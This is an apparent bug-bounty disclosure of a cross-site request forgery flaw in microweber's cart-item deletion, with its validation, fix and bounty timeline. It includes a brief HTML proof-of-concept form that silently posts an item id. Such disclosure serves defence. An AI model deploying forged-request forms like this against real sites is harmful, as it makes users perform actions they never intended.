Cross-Site Request Forgery (CSRF) in microweber/microweber


Reported on

Oct 26th 2021


There is a CSRF on Delete Cart Item in users side.

I get this error "Item not removed from cart" message but the item already will be deleted.(message isn't correct and the delete action will be done)

Proof of Concept

// PoC.html

  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="id" value="125" />
      <input type="submit" value="Submit request" />

after that you click on submit button the item with 125 id will be deleted from the cart.

We have contacted a member of the microweber team and are waiting to hear back a year ago
Peter Ivanov validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed in 1.2.11 with commit 2fa9a6 a year ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
api_callbacks.php#L126 has been validated
shop.js#L115-L133 has been validated
ShopManager.php#L101-L105 has been validated
shop.php#L104-L115 has been validated
to join this conversation